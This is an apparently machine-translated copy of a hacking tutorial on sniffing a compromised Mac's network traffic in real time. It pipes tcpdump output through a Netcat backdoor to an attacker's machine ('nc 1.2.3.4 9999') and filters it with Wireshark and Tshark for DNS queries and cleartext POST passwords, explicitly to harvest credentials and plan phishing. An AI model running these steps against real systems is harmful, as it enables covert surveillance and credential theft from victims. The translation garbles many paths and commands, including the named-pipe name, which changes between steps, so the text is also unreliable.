قالب وردپرس درنا توس
Home / Tips and Tricks / How To Sniff Passwords On A Mac In Real Time, Part 2 (Packet Analysis) «Zero Bytes :: WonderHowTo

How To Sniff Passwords On A Mac In Real Time, Part 2 (Packet Analysis) «Zero Bytes :: WonderHowTo



Most users do not know how much valuable data is in their network traffic. With a few simple tools, an attacker can quickly select cookies, passwords, and DNS requests from a MacOS device while hiding the victim's network traffic to the attacker's system. Here we will discuss two methods for parsing packages that flow from a Mac.

The first method requires Wireshark, which was previously treated with zero bytes. However, using Wireshark to parse packets from a remote device in real time may be a novel concept for some readers.

Method two requires Tshark, Wireshark's command line network protocol analyzer. Tshark is great because, unlike Wireshark, which displays everything and only searches thousands of packages, it just prints the information we ask for it. Readers who prefer command-line tools over graphical applications will appreciate Tshark and its simplicity.

Option 1
: Wireshark

I will try to be brief about installing and using Wireshark, as it was presented in zero bytes several times before. So, if you are completely new to Wireshark, it would be a good idea to review all the instructions we have on it, if you want to be proficient with the tool.

Step 1: Install Wireshark

By default, Wireshark is included in most versions of Kali Linux. There are some versions that do not contain it, so I'll treat it quickly, as it gets, if you do not see it in your Kali version. First run the following command to make sure that the last tested and curated version (by the Kali developers) is available and download it

  apt-get update && apt-get install wireshark

Hits: 1 http://archive-7.kali.org/kali kali-rolling InRelease
Read package lists ... Done
Read package lists ... Done
Create dependency structure
Read status information ... Done
The following packages are being updated:
Wireshark
1 updated, 0 reinstalled, 0 removed and 963 not updated.
Need 57.2 kb of archives.
After this operation, 3.072 B of additional space is used.
Get: 1 http://archive-7.kali.org/kali kali- rolling / main amd64 wireshark amd64 2.6.1-1 [57.2 kB]
Reached 57.2 kb in 7s (8.296 B / s)
Read changelogs ... Done
(Reading the database ... 321253 Files and directories are currently installed.)
Preparation for unpacking ... / wireshark_2.6.1-1_amd64.deb ...
Unpack Wireshark (2.6.1-1) via (2.4.5-1) ...
Setting up Wireshark (2.6.1-1) ... 

When that's done, Wireshark can be found in the "Sniffing & Spoofing" category in Kali's "Applications" menu.

Step 2: View the data in real time

Instead of storing the packets in a PCAP ( as described in my previous article), we can pipette the data coming from the Netcat tunnel and view it in real time , This can be accomplished with a named pipe and the command mkfifo to redirect the raw packets directly to Wireshark.

In Kali (attacker's system), use the following command to create a named pipe.

  mkfifo / tmp / shield 

Then launch a Netcat listener and pipe (> ) the output to the pipe called "listening" in the / tmp / directory. The name of the pipe ("listen") is completely arbitrary and can be named arbitrarily. Netcat is listening ( -l ) on port ( -p ) 9999 for incoming connections from the macOS device

  nc -l -p 9999> / tmp / Shielding 

Now open the wirhark intercept mail file with argument -k to immediately begin capturing packets. The input file ( -i ) should refer to the listening pipe we just created.

  wireshark -k -i / tmp / wiretapping 

Wireshark opens, but does not show any packets yet. The setup on the attacker's Kali machine is complete at this time.

Now we have to execute the command tcpdump on the MacOS device to instruct him to send us the packages of the victim. From the Netcat backdoor, first use the command ifconfig to get the name of the target's wireless interface.

  / sbin / ifconfig -a

lo0: flags = 8049  mtu 16384
Options = 1203 
inet 127.0.0.1 Netmask 0xff000000
inet6 :: 1 prefixlen 128
inet6 fe80 :: 1% lo0 prefixlen 64 scopeid 0x1
nd6 options = 201 
gif0: flags = 8010  mtu 1280
stf0: flags = 0 <> mtu 1280
EHC29: Flags = 0 <> Mtu 0
EHC26: flags = 0 <> Mtu 0
XHC20: flags = 0 <> Mtu 0
en0: flags = 8863  mtu 1500
Ether e0: b9: ba: c8: bc: c8
inet 192.168.0.133 Netmask 0xffffff00 Broadcast 192.168.0.255
nd6 options = 201 
Media: automatic selection
Status: Active
en1: flags = 8963  mtu 1500
Options = 60 
Media: Autoselect 
Status: inactive
bash-3.2 # 

The interface with the address "inet" of "192.168.0.133" is the wireless interface of my MacBook. In my case, the name of the interface is "en0", but this may vary depending on the MacOS device and version.

Use the interface ( -i ) argument in the following tcpdump command when sending traffic to the attacker system. In this command, tcpdump will write the captured data directly into the Netcat tunnel ( -w ). The address 1.2.3.4 should be changed to the IP address of the attacker hosting the netcat listener. This can be a local IP address or a remote VPS IP address.

  / usr / sbin / tcpdump -i  -w - | nc 1.2.3.4 9999 

As long as both terminals are open, Tcpdump sends real-time network traffic directly to the attacker's system and to Wireshark.

Step 3: Sniff DNS Traffic to Find Phishing Candidates

Unfortunately, today (for hackers) many sites use encryption that prevents sniffer credentials from being learned. Tracking domain name traffic owned by sites that send and receive encrypted data still has benefits. We can learn a lot about a target by analyzing their DNS traffic and preferred sites for future phishing attacks.

To filter DNS transmissions, enter the DNS string in Wireshark's filter bar.

Step 4: Tag POST Data for Passwords

The most popular websites use encryption, but there are still many protocols and Millions of Websites Do not encrypt sensitive data. POST data is likely to contain the most compromising and insightful information. Here we may find usernames, passwords, home addresses, e-mail addresses, social security information, chat logs, and more.

To filter POST data, enter http.request.method == "POST". string in Wireshark's Display Filter Bar

Option 2: Tshark

Alternatively, we can use Tshark with the previously created one Stream "/ tmp / shielding" tap. Tshark is not necessarily better than Wireshark . For both tools there are some advantages and disadvantages. Tshark will only show what we ask of it, which means that we can miss some tiny (but valuable) data because we have restricted the display filter to something too fine. Conversely, Wireshark can display too much information and cause us to miss some useful bit data. Once again, pros and cons for both tools.

Step 1: Install Tshark

Tshark is available in the Kali repositories and can be installed with the following command.

  apt-get update && apt-get install tshark

Hits: 1 http://archive-7.kali.org/kali kali-rolling InRelease
Read package lists ... Done
Read package lists ... Done
Create dependency structure
Read status information ... Done
Use "apt autoremove" to remove it.
The following NEW packages will be installed:
tshark
0 updated, 1 newly installed, 0 removed and 945 not updated.
Need 186 kB of archives.
After this operation, 404 KB of additional space is used.
Get: 1 http://archive-7.kali.org/kali kali-rolling / main amd64 tshark amd64 2.6.1-1 [186 kB]
Retrieved 186 kB in 7s (27.0 kB / s)
Select the previously unselected tshark package.
(Reading the database ... 321331 Files and directories are currently installed.)
Preparation for unpacking ... / tshark_2.6.1-1_amd64.deb ...
Unpack Tshark (2.6.1-1) ...
Processing trigger for man-db (2.8.2-1) ...
Setting up Tshark (2.6.1-1) ... 

Step 2: Sniff DNS queries with Tshark

Use the following command to dump DNS traffic. We filter out packets on port 53 and DNS queries with the argument dns.qry.name . The Tshark arguments ( -e ) are just like Wireshark's display filters, allowing the use of -T fields .

  tshark -i / tmp / listen -f "src port 53" -n -T fields -e dns.qry.name

Capturing on & # 39; / tmp / listening & # 39;
twitch.tv
twitch.tv
www.twitch.tv
www.twitch.tv
linkedin.com
linkedin.com
www.linkedin.com
www.linkedin.com
statisch.twitchcdn.net
statisch.twitchcdn.net
ocsp.digicert.com
yahoo.co.jp
yahoo.co.jp
yahoo.co.jp
static.licdn.com
www.yahoo.co.jp
static.licdn.com
www.yahoo.co.jp
www.yahoo.co.jp
ocsp.cybertrust.ne.jp
ocsp.cybertrust.ne.jp
office.com
www.office.com
s.yimg.jp
www.office.com
www.office.com
www.office.com
s.yimg.jp
s.yimg.jp
weuofficehome.msocdn.com
statik-uhf-neu.akamaized.net
c.microsoft.com
c.microsoft.com
lpt.c.yimg.jp
iwiz-blog-cms.c.yimg.jp 

Using this data, we can easily identify a target's favorite sites and begin preparing phishing sites for social engineering attacks.

Step 3: Sniff Passwords with Tshark [19659005] Filter POST requests ( http.request.method == POST ) with the string " pass " to find passwords that are sent in clear text. Also, use several fields ( -e ) arguments to print the full URL ( http.request.full_uri ), the POST data key ( urlencoded-form.key ) and their values ​​( urlencoded-form.value ). The keys help us to understand how the values ​​are formatted. For example, a key could read "username, password" while the corresponding values ​​read "tokyoneon, Pa $$ word321". Below are two examples.

  tshark -i / tmp / listen -Y & # 39; http.request.method == POST and tcp contains "pass" & # 39; -T fields -e http.request.full_uri -e urlencoded-form.key -e urlencoded-form.value

Capturing on & # 39; / tmp / listening & # 39;

http://www.website.org/servlet/login? Username, password, rememberme, srv hacker @ nullbyte.com, 123Password321,1,12

http://login.website2.com/?r=75aa94fce9687c7aa43e91d1572a1dbd login, password, login fakeemail@gmail.com, y0u11 n3v3r gU3 $$ MY Pa $$ w0rd !!, Login 

Some POST data contains several parameters is more difficult to interpret. Here we see an authentication token followed by the user's email address and password.

  tshark -i / tmp / listen -Y & # 39; http.request.method == POST and tcp contains "pass" & # 39; -T fields -e http.request.full_uri -e urlencoded-form.key -e urlencoded-form.value

Capturing on & # 39; / tmp / listening & # 39;

http://login.website3.com/users/sign_in utf8, authenticity_token, user [email] user [password] commit, user [remember_me] ✓, ji5H6Z6WO + bwup3ey / 3kI2P7 ++ 5t6ptj87y9uTAQ7rw0o4QNP + EAKUVIAW5xCScd60sqPyz8bMj + AoumPIUzQ ==, Hacker @ nullbyte.com, 123Password321 ,, 0
http://login.website3.com/users/sign_in utf8, authenticity_token, user [email] user [password] commit, user [remember_me] ✓, HCsJXi + xDjkOhIXxl + g1JVg4EzKTBBBjIl3YifZ2 + bWmpsq6jsY19rt2GUEtHPYb0IjC49IS58gv4 + 6uXpQDxA ==, Hacker @ nullbyte .com , 123passw0rd321 ,, 0 

Tshark and Wireshark are both excellent tools for snooping packets. Readers who also prefer to work in terminals prefer Tshark over Wireshark. For a comprehensive look at display filters, read the official documentation from Wireshark.

Do Not Miss: White Hat's Guide to Selecting a Virtual Private Server

Cover Picture of Negative Space / Pexels; Screenshots of tokyoneon / Null Byte

Source link